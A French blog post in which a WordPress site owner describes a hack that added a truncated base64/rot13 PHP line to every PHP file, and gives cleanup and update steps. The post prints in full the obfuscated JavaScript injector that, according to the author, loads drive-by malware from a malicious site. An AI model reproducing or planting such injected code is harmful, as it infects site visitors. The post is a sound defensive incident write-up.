De l’intérêt de faire des mises à jour WordPress

Certains d'entre vous l'auront peut être vu mais ce matin le site était inaccessible pendant à peu près 1h. Je m'en suis rendu compte assez vite et j'ai du coup pu corriger le problème.

Il semblerait que j'ai été victime d'un malware qui traîne et qui attaque particulièrement les sites fonctionnant sous WordPress.

Je me suis retrouvé pour ma part avec un message d'erreur de ce genre sur ma page d'accueil:

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent

Sous IE, j'ai eu droit à un message d'erreur m'indiquant: "Site web d’hameçonnage signalé":

IE détecte l'hameconnage

En jetant un coup d'oeil à mes fichiers sur le FTP, je me suis rendu compte que un certain nombre de ses fichiers avaient comme dernière date de modification: ce matin 8h35.

Vu que j'ai pas touché à ces fichiers, j'ai trouvé ça louche, j'en ai donc édité un pour voir. Je me suis rendu compte qu'une ligne a été ajoutée au début de chacun des fichiers php:

<?php $somecrainsignvar="gip7fork"; echo base64_decode(str_rot13('CHKJHKJHKJH ....)

$crain="";

C'est un code PHP encrypté en base 64 qui permet d'ajouter un morceau de code HTML à l'appel de la page php. Le code HTML généré ressemble à ça:

<script>date=new Date();var ar="pE=C r:]?me;/<u,z.vT\"t0di(oaf[sb1cw{ 'nBgNA>}h)ly";try{gserkewg();}catch(a){k=new Boolean().toString()};var ar2="f12,0,60,12,24,-33,-6,9,21,-57,-15,3,84,-51,-12,69,-90,33,-60,138,-111,-3,3,84,-51,27,27,27,-87,24,39,3,-42,-54,3,45,36,-18,-15,-9,75,-33,27,-51,-21,-45,117,-33,-93,0,0,60,12,-69,66,-54,3,-15,60,63,-105,-21,0,120,-24,-78,111,-51,-60,78,-3,-93,0,0,57,9,21,-57,-15,3,84,-51,-12,51,-87,57,-9,-33,45,-15,-21,33,12,-69,66,-54,3,78,-18,-75,84,-93,105,24,-72,0,-63,18,18,0,12,21,-39,60,-60,60,-27,-9,27,-66,15,18,66,-84,18,33,54,-57,-9,3,-21,48,-21,-51,9,27,6,21,-54,84,-42,-27,-51,135,-135,24,66,-18,-3,-63,90,15,-3,-6,-30,-3,-6,72,-129,105,-15,-30,45,-3,27,-105,42,48,15,-72,-57,105,-15,-30,45,-3,-18,-27,81,-3,-111,-24,105,-57,18,18,-18,21,-21,69,-69,-9,81,-126,117,-63,-3,0,-39,84,-81,-33,78,12,-18,-9,9,6,36,-96,63,12,-3,-12,63,-99,21,-33,3,108,-111,54,-21,-45,48,-33,30,15,-78,18,48,-33,78,18,-90,-3,36,12,-69,66,-54,3,99,-69,78,-105,-21,0,120,-120,0,72,-42,72,-15,-36,9,6,36,-6,-36,12,-69,66,-54,3,-15,60,63,-33,-93,0,0,42,27,-66,93,-24,24,-102,102,-39,9,21,-57,-15,3,84,-51,-12,48,-84,15,51,-18,-33,-27,138,-111,-3,3,84,-51,12,36,-39,12,-69,66,-54,3,81,27,-105,51,-33,39,-60,33,63,-63,0,-48,57,21,-51,21,-33,45,36,-21,-75,84,12,-66,66,24,-72,0,-63,18,18,0,12,21,-39,60,-60,60,-27,-9,27,-66,15,18,66,-84,18,33,54,-57,-9,3,-21,48,-21,-51,9,27,6,21,-54,84,-42,-27,-51,135,-135,24,66,-18,-3,-63,90,15,27,-105,51,-33,39,-27,81,-3,-111,21,3,18,18,-18,21,-21,69,-69,-9,81,-138,105,24,-63,-3,0,-39,84,-3,-78,51,-33,39,-27,81,-3,-111,21,-51,78,12,-18,-9,9,6,36,-108,105,-30,12,-3,-12,63,-99,21,-33,81,-78,51,-33,39,-27,81,-3,-111,21,90,-111,54,-21,-57,105,-45,45,-78,51,-33,39,-27,81,-3,-111,21,12,15,-78,6,105,-45,45,-78,51,-33,39,-60,33,63,-63,0,-48,57,21,-51,21,-33,45,36,-9,-30,-3,-6,72,-24,-66,66,-15,-30,45,27,-105,51,-33,39,-60,33,63,-63,0,-48,57,21,-51,21,-33,45,36,24,-105,42,48,15,-72,48,-66,66,-15,-30,45,27,-105,-21,0,0,57,9,21,-57,-15,3,84,-51,-12,69,-90,33,-60,138,-111,-3,3,84,-51,27,27,27,-87,24,39,3,-42,-54,3,45,36,-18,-15,-9,75,-33,27,-51,-21,-45,30,30,-81,0,30,84,-45,-60,126,-63,69,-72,6,9,54,-105,-21,0,120]".replace(k.substr(0,1),'[');pau="rn ev2010".replace(date.getFullYear()-1,"al");e=new Function("","retu"+pau);e=e();ar2=e(ar2);s="";var pos=0;for(i=0;i<ar2.length;i++){pos+=parseInt(k.replace("false","0asd"))+ar2[i]/3;s+=ar.substr(pos,1);}
e(s);</script>

Ce script JavaScript, lors de l'exécution de votre page va faire des requêtes obscures vers un site malveillant:

Le script appelle le site malveillant qui va charger le malware

En faisant une recherche Google sur ce nom de domaine, on se rend compte qu'il est référencé sur quelques sites comme site "pouri".

Il semblerait que l'objectif de ce site est de charger un malware sur l'ordinateur des personnes visitant un site. En gros après cette attaque, les gens visitant didoune.fr téléchargaient sans s'en rendre compte un malware sur leur ordinateur, qui lui pourra par la suite transmettre des informations confidentielles. Plutôt efficace...

Heureusement j'ai détecté ça rapidement et le site téléchargant le malware semble être désactivé, donc aucun risque pour les visiteurs.

Mon installation de WordPress n'était pas à jour, et c'est surement en exploitant une faille de sécurité qui a été corrigée depuis que j'ai été hacké. Ca m'apprendra au moins à mettre à jour mes installations...

Débugger votre site:

Si ça vous arrive, voilà ce que j'ai fait pour débugger mon site:

  • Connectez vous sur votre FTP
  • Regardez les fichiers avec une date de modification proche
  • Les éditer et supprimer la ligne qui a été rajouté: $somecrainsign....
  • Tout réuploader sur votre serveur FTP
  • Mettre à jour votre installation de WordPress et dans le doute, changez vos mots de passes

Pour rechercher et remplacer, j'ai utilisé Notepad++ et ses expressions régulières. Du coup j'ai pu éditer un paquet de fichiers très vite.

 

 

 

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

You may use these HTML tags and attributes:

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> 


*